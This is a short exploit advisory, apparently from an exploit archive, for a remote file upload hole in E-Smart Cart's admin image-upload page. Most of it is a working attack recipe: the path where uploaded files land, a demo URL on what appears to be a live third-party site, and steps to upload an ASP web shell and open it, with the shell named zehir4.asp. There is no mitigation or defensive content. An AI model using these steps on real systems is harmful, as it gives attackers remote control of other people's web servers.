E-Smart Cart suffers from a remote file upload vulnerability.
2ff28932cfa6530d4666dbddcb94ca50c9cafc75391839f75c0819f2c45c47dc
[~] E-SMART CART Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] D-Unit: ZoRLu & SuB-ZeRo
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------
exp:
http://localhost/script/embadmin/base_ads/[id]_shell.asp
exp for demo:
http://preproject.com/GScart/embadmin/main_baseimage.asp?action=add
you go to here and click to gozat button, select your_shell.asp and write link
after goo shell
http://preproject.com/GScart/embadmin/base_ads/zehir4.asp
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Cyber-Zone
[~]
[~] yildirimordulari.org & packetstormsecurity.org & exploiter5.com
[~]
[~]----------------------------------------------------------------------